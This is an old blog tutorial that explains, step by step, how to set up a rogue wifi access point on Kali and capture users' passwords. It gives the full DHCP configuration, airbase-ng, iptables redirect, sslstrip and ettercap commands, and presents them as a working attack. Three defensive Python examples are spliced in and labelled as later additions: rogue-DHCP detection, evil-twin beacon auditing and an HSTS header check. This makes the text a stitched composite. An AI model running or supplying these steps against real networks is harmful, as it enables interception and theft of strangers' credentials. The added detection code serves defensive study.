Tuesday, 30 September 2014

Capturing all passwords and usernames on a wifi network

In this tutorial we will be doing a MITM attack via a fake access point.

Here is what Wikipedia says: A rogue access point is a wireless access point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle attack.

Basically, a rogue AP is a fake AP which you can use to do MITM attacks. If you don't know what a MITM attack is, even after the thousands of posts about it, you can read our old post on the Learn to hack page.

This method uses a DHCP server. There are other methods which I will cover in another tutorial.

So let's start.

What do you need?

1. Either a VM running Kali or a PC/laptop running it
2. 2x network adapters (or one wireless adapter plus a wired connection for the upstream link)
3. One of them must support both monitor and master mode

What do you need to do?

Configure the DHCP Server

1. Open a terminal
2. route -n (note the gateway; I'll assume the GW is 192.168.0.1)
3. apt-get install dhcp3-server (install the DHCP server)
4. nano /etc/dhcpd.conf (configure the DHCP server)
5. Type or paste the following into your .conf:
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name "name you want the router to be called";
option domain-name-servers 192.168.1.1;
range 192.168.1.2 192.168.1.40;
}
6. Hit Ctrl+X, then Y, then Enter (save the file)
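The dhcpd.conf above makes the fake AP hand out itself (192.168.1.1) as both default gateway and DNS server, which is exactly what a rogue DHCP server on a real network looks like from the defender's side. The following is an added example, not code from the original post: it decodes the option list of a DHCP OFFER (RFC 2132 TLV format) and flags offers whose server identifier, router or DNS option does not match the authorized infrastructure, the same check a DHCP-snooping feature performs. The two OFFER packets and the authorized-server list are constructed for the demo.

```python
# Added example (not from the original post): parse the options field of a
# DHCP OFFER and flag offers that do not come from the network's authorized
# DHCP server. Sample packets below are constructed, not captured.
import ipaddress
from typing import Dict, Optional

# DHCP option codes (RFC 2132)
OPT_PAD, OPT_SUBNET_MASK, OPT_ROUTER, OPT_DNS = 0, 1, 3, 6
OPT_MSG_TYPE, OPT_SERVER_ID, OPT_END = 53, 54, 255
DHCPOFFER = 2

# Authorized infrastructure for this constructed network (assumption).
AUTHORIZED_DHCP_SERVERS = {"192.168.0.1"}
AUTHORIZED_GATEWAYS = {"192.168.0.1"}


def parse_dhcp_options(data: bytes) -> Dict[int, bytes]:
    """Decode the TLV option list that follows the DHCP magic cookie."""
    opts, i = {}, 0
    while i < len(data):
        code = data[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:          # pad has no length byte
            i += 1
            continue
        if i + 1 >= len(data):
            raise ValueError("truncated option header")
        length = data[i + 1]
        value = data[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        opts[code] = value
        i += 2 + length
    return opts


def ip4(raw: Optional[bytes]) -> Optional[str]:
    return None if raw is None else str(ipaddress.IPv4Address(raw[:4]))


def classify_offer(options: bytes) -> dict:
    """Return a verdict for one DHCP OFFER: who sent it and whether it is rogue."""
    opts = parse_dhcp_options(options)
    if opts.get(OPT_MSG_TYPE) != bytes([DHCPOFFER]):
        return {"rogue": False, "reason": "not a DHCPOFFER"}
    server, router, dns = (ip4(opts.get(OPT_SERVER_ID)),
                           ip4(opts.get(OPT_ROUTER)), ip4(opts.get(OPT_DNS)))
    reasons = []
    if server is None:
        reasons.append("offer carries no server identifier")
    elif server not in AUTHORIZED_DHCP_SERVERS:
        reasons.append(f"unauthorized DHCP server {server}")
    if router and router not in AUTHORIZED_GATEWAYS:
        reasons.append(f"unexpected default gateway {router}")
    if dns and dns not in AUTHORIZED_GATEWAYS:
        reasons.append(f"unexpected DNS server {dns}")
    return {"server": server, "router": router, "dns": dns,
            "rogue": bool(reasons), "reason": "; ".join(reasons) or "ok"}


def build_options(msg_type: int, server: str, router: str, dns: str) -> bytes:
    """Assemble a constructed OFFER option list for the demo."""
    def tlv(code: int, value: bytes) -> bytes:
        return bytes([code, len(value)]) + value
    packed = lambda ip: ipaddress.IPv4Address(ip).packed
    return (tlv(OPT_MSG_TYPE, bytes([msg_type]))
            + tlv(OPT_SERVER_ID, packed(server))
            + tlv(OPT_SUBNET_MASK, packed("255.255.255.0"))
            + tlv(OPT_ROUTER, packed(router))
            + tlv(OPT_DNS, packed(dns))
            + bytes([OPT_END]))


# Constructed samples: the real router's offer, and an offer shaped like the
# one the dhcpd.conf above produces (server, router and DNS all 192.168.1.1).
LEGIT_OFFER = build_options(DHCPOFFER, "192.168.0.1", "192.168.0.1", "192.168.0.1")
ROGUE_OFFER = build_options(DHCPOFFER, "192.168.1.1", "192.168.1.1", "192.168.1.1")

if __name__ == "__main__":
    for name, pkt in (("legit", LEGIT_OFFER), ("rogue", ROGUE_OFFER)):
        print(name, classify_offer(pkt))
```

On a switch with DHCP snooping this verdict is what decides whether the OFFER is dropped; on a host, the same logic run over a packet capture of UDP port 67/68 traffic is a cheap way to notice a second DHCP server appearing on the segment.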

Start the AP

1. airmon-ng (check the network adapter; I'll assume it's wlan0)
2. airmon-ng start wlan0 (start monitor mode, which creates mon0)
3. airbase-ng -c 11 -e "name you want it to be called" mon0
4. DON'T CLOSE THE TERMINAL
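The airbase-ng command above advertises whatever ESSID you choose on channel 11 from a BSSID that belongs to your own adapter, so on a managed network the fake AP shows up as a known SSID coming from an unknown BSSID. The following is an added example, not code from the original post, of the check a wireless IDS or a periodic site survey performs: it compares observed beacons against an inventory of authorized APs and reports SSID clones (evil twins) and inventory BSSIDs seen on the wrong channel. The survey rows, the inventory and the "bssid,channel,ssid" CSV format are all constructed for the demo.

```python
# Added example (not from the original post): flag "evil twin" beacons, i.e. an
# SSID we own being advertised by a BSSID that is not in our AP inventory, and
# inventory BSSIDs seen on a channel they are not configured for. The survey
# below is constructed; in practice it would come from a wireless scanner.
# Assumed survey format: one "bssid,channel,ssid" row per observed beacon.
import csv
import io
from typing import Dict, List

# Authorized APs (assumption for the demo): SSID -> {BSSID: configured channel}.
INVENTORY: Dict[str, Dict[str, int]] = {
    "CorpWiFi": {"00:11:22:33:44:55": 6, "00:11:22:33:44:66": 11},
}

# Constructed scan results. Row 3 is a rogue AP cloning the corporate SSID on
# channel 11; row 4 reuses a real BSSID on a channel it is not configured for.
SURVEY = """bssid,channel,ssid
00:11:22:33:44:55,6,CorpWiFi
00:11:22:33:44:66,11,CorpWiFi
de:ad:be:ef:00:01,11,CorpWiFi
00:11:22:33:44:55,1,CorpWiFi
aa:bb:cc:dd:ee:ff,1,Guest-Coffee
"""


def audit_beacons(survey_csv: str, inventory: Dict[str, Dict[str, int]]) -> List[dict]:
    """Return one finding per suspicious beacon; SSIDs we do not own are ignored."""
    findings = []
    for row in csv.DictReader(io.StringIO(survey_csv)):
        ssid, bssid, channel = row["ssid"], row["bssid"].lower(), int(row["channel"])
        if ssid not in inventory:
            continue  # foreign networks are not our concern here
        known = {b.lower(): ch for b, ch in inventory[ssid].items()}
        if bssid not in known:
            findings.append({"kind": "evil_twin", "ssid": ssid,
                             "bssid": bssid, "channel": channel})
        elif known[bssid] != channel:
            findings.append({"kind": "bssid_spoof_or_misconfig", "ssid": ssid,
                             "bssid": bssid, "channel": channel,
                             "expected_channel": known[bssid]})
    return findings


if __name__ == "__main__":
    for finding in audit_beacons(SURVEY, INVENTORY):
        print(finding)
```

The inventory-based check is deliberately simple: it will also fire on a legitimately relocated AP, so the second finding kind is worded as "spoof or misconfiguration" and needs a human to confirm. Clients that only trust the SSID cannot tell the two BSSIDs apart, which is the whole reason the rogue AP works and the reason enterprise deployments pin the RADIUS server certificate (802.1X) rather than rely on the network name.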

Configure the Tunnel Interface

1. Open a terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 (set IP and netmask)
3. ifconfig at0 mtu 1400 (set MTU)
4. route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 (add the route)
5. echo 1 > /proc/sys/net/ipv4/ip_forward (enable IP forwarding)
6. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1 (send UDP, i.e. the clients' DNS, on to the real gateway)
7. iptables -P FORWARD ACCEPT (accept forwarding)
8. iptables --append FORWARD --in-interface at0 -j ACCEPT
9. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
10. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

Start DHCP Server

1. dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
2. /etc/init.d/isc-dhcp-server start

Start SSLstrip

1. sslstrip -f -p -k -l 10000 (listen on port 10000, where the iptables rule redirects port 80; -k takes no argument)
2. DON'T CLOSE THE TERMINAL
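sslstrip only works while the client is willing to talk plain HTTP: the REDIRECT rule above catches port 80, and a browser that has a cached HTTP Strict Transport Security (HSTS, RFC 6797) policy for a host will not send port-80 traffic to it at all, so stripped links never connect. The following is an added example, not code from the original post, that a site owner can use to judge how well their own response headers hold up against this downgrade: it parses the Strict-Transport-Security header and returns a verdict. The three responses and the one-year max-age floor are constructed assumptions.

```python
# Added example (not from the original post): decide how well a site's
# Strict-Transport-Security (HSTS, RFC 6797) policy resists the HTTP downgrade
# that sslstrip depends on. A browser that has cached a valid HSTS policy for a
# host refuses to load it over plain HTTP, so stripped links never connect.
# The response headers below are constructed.
from typing import Dict, Optional

MIN_MAX_AGE = 31536000  # one year; assumed floor for a policy worth relying on


def parse_hsts(header: Optional[str]) -> Optional[dict]:
    """Parse an HSTS header value into its directives.

    Returns None when browsers would ignore the header (missing or malformed
    max-age). Directive names are case-insensitive; unknown ones are skipped.
    """
    if header is None:
        return None
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in header.split(";"):
        name, _, value = directive.strip().partition("=")
        name, value = name.strip().lower(), value.strip().strip('"')
        if name == "max-age":
            if not value.isdigit():
                return None  # malformed max-age: the whole header is ignored
            policy["max_age"] = int(value)
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy if policy["max_age"] is not None else None


def downgrade_resistance(headers: Dict[str, str]) -> str:
    """Verdict for a returning visitor. A first visit is only protected if the
    host is on the browser's preload list, which this check cannot see."""
    hsts = parse_hsts(headers.get("Strict-Transport-Security"))
    if hsts is None:
        return "none: no valid HSTS, any visit can be held on plain HTTP"
    if hsts["max_age"] == 0:
        return "none: max-age=0 deletes any cached policy"
    if hsts["max_age"] < MIN_MAX_AGE:
        return "partial: short max-age, protection lapses soon after the last HTTPS visit"
    if not hsts["include_subdomains"]:
        return "good: returning visitors protected on this host only"
    return "strong: returning visitors protected on this host and all subdomains"


# Constructed responses for three hypothetical sites.
SAMPLES = {
    "legacy-bank.example": {"Content-Type": "text/html"},
    "shop.example": {"Strict-Transport-Security": "max-age=300"},
    "mail.example": {"Strict-Transport-Security":
                     "max-age=63072000; includeSubDomains; preload"},
}

if __name__ == "__main__":
    for host, headers in SAMPLES.items():
        print(f"{host}: {downgrade_resistance(headers)}")
```

Two caveats the verdict strings already hint at: the header is only honoured when received over HTTPS, so a victim who has never reached the site over TLS has no cached policy, and only preloading closes that first-visit window; and a policy without includeSubDomains leaves a stripped link to any subdomain unprotected.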

Harvest

1. Open a terminal
2. ettercap -p -u -T -q -i at0 (start ettercap in quiet text mode on at0)

Congrats! If you haven't run into any errors, you should be able to see all user/pass pairs being sent over the AP.
